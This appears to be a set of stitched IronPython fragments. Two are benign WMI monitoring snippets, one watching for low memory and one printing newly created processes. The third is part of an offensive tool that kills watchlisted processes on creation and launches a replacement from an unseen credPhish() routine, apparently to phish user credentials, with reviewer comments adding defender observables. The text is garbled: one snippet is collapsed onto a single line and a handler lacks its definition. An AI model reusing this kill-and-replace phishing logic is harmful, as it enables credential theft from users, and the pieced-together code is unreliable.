# For impersonation rather than authentication: # from System.Management import AuthenticationLevel, ImpersonationLevel # options.Impersonation = ImpersonationLevel.Impersonate # options.Authentication = AuthenticationLevel.Default options.EnablePrivileges = True scope = ManagementScope(r"\\FullComputerName\root\cimv2", options) # Available Physical Memory dropping below 10Mb wql = ('TargetInstance ISA "Win32_OperatingSystem" AND ' 'TargetInstance.FreePhysicalMemory < 10000 ') timeout = TimeSpan(0, 0, 5) query = WqlEventQuery("__InstanceModificationEvent", timeout, wql) watcher = ManagementEventWatcher() watcher.Query = query watcher.Scope = scope interesting_properties = ( 'FreePhysicalMemory', 'FreeSpaceInPagingFiles', 'FreeVirtualMemory', 'NumberOfProcesses', 'NumberOfUsers', 'OSArchitecture', 'ServicePackMajorVersion', 'ServicePackMinorVersion', 'SizeStoredInPagingFiles', 'Status', 'TotalVirtualMemorySize',
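# Print every property of each newly created Win32_Process, using a WMI
# temporary event subscription (IronPython; System.Management).
import clr
clr.AddReference('System.Management')
from System.Management import WqlEventQuery, ManagementEventWatcher
from System import TimeSpan
from System.Threading import Thread

# Poll interval (the WQL WITHIN clause) for the intrinsic creation event; a
# process that starts and exits inside this window may not be reported.
timeout = TimeSpan(0, 0, 1)
query = WqlEventQuery("__InstanceCreationEvent", timeout, 'TargetInstance isa "Win32_Process"')
watcher = ManagementEventWatcher()
watcher.Query = query


def arrived(sender, event):
    """EventArrived handler: dump the properties of the created process.

    sender: the ManagementEventWatcher that raised the event (unused).
    event:  EventArrivedEventArgs; its NewEvent carries the embedded
            TargetInstance (the Win32_Process that was just created).
    """
    print('Event arrived')
    real_event = event.NewEvent
    instance = real_event['TargetInstance']
    for entry in instance.Properties:
        print('%s %s' % (entry.Name, entry.Value))


watcher.EventArrived += arrived
watcher.Start()
print('started')
try:
    # Events are delivered on a worker thread; just keep the main thread alive.
    while True:
        Thread.CurrentThread.Join(1000)
finally:
    # Cancel the WMI subscription however the loop ends (Ctrl-C, an error);
    # the original had no cleanup path and left the watcher running.
    watcher.Stop()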
# The statements up to `def procWatch` are the tail of an event handler whose
# `def` line (and its parameter `e`) is outside this chunk; the indentation
# below is reconstructed from the collapsed original.
proc = e.NewEvent
if proc['TargetInstance']['Name'] in WATCHLIST:
    # Terminate the just-created process by PID, then launch whatever
    # credPhish() (defined elsewhere, not visible here) prepares in its place.
    Process.GetProcessById(proc['TargetInstance']['ProcessId']).Kill()
    print "[+] KILL SUCCESS: {0}\t{1}".format(proc['TargetInstance']['ProcessId'], proc['TargetInstance']['CommandLine'])
    cp = credPhish(proc)
    print "[+] PROCESS SPAWNED: {0} {1}".format(cp.path, cp.NewProcess.StartInfo.Arguments)
    cp.NewProcess.Start()
    # NOTE(review): ExitCode is read immediately after Start(); .NET
    # Process.ExitCode throws if the process has not exited yet -- presumably
    # why procWatch() below does not read it. Confirm before relying on this.
    print "[!] PROCESS EXIT CODE: {0}".format(cp.NewProcess.ExitCode)


def procWatch():
    """Block until a watchlisted process is created, kill it and start the replacement.

    Reads module globals WATCHLIST (process names), GOT_CRED (loop flag, set
    elsewhere -- not visible in this chunk) and startWatch (the
    ManagementEventWatcher created in the try block below). Returns None.
    From a defender's view the observable is a watchlisted process terminated
    within the 1 s poll interval of its creation and immediately followed by
    a new process from a different image.
    """
    print "[*] Watching Process Creation for: {0}".format(", ".join(WATCHLIST))
    while GOT_CRED is False:
        try:
            # Blocks until the next __InstanceCreationEvent; no watcher timeout
            # is set, so this can wait indefinitely.
            proc = startWatch.WaitForNextEvent()
            if proc['TargetInstance']['Name'] in WATCHLIST:
                Process.GetProcessById(proc['TargetInstance']['ProcessId']).Kill()
                print "[+] KILL SUCCESS: {0}\t{1}".format(proc['TargetInstance']['ProcessId'], proc['TargetInstance']['CommandLine'])
                cp = credPhish(proc)
                if hasattr(cp, "NewProcess"):
                    cp.NewProcess.Start()
                    print "[+] PROCESS SPAWNED: {0}\t{1} {2}".format(cp.NewProcess.Id, cp.path, cp.NewProcess.StartInfo.Arguments)
                    #Process.GetCurrentProcess.Kill()
                    # Aborts the calling thread; in IronPython this surfaces as a
                    # .NET ThreadAbortException, presumably caught by the bare
                    # except below -- so `break` is effectively how the loop ends.
                    Thread.GetCurrentThread().Abort()
        except:
            # Bare except: swallows every error (WMI access denied, a PID that
            # already exited, KeyboardInterrupt) and silently ends the loop, so
            # the outer `except KeyboardInterrupt` never sees Ctrl-C from here.
            break


try:
    startWatch = ManagementEventWatcher(WqlEventQuery("__InstanceCreationEvent", TimeSpan(0,0,1), 'TargetInstance isa "Win32_Process"' ))
    procWatch()
except KeyboardInterrupt:
    # Only covers watcher construction and the startup print; see the bare
    # except inside procWatch().
    print "[*] Exiting."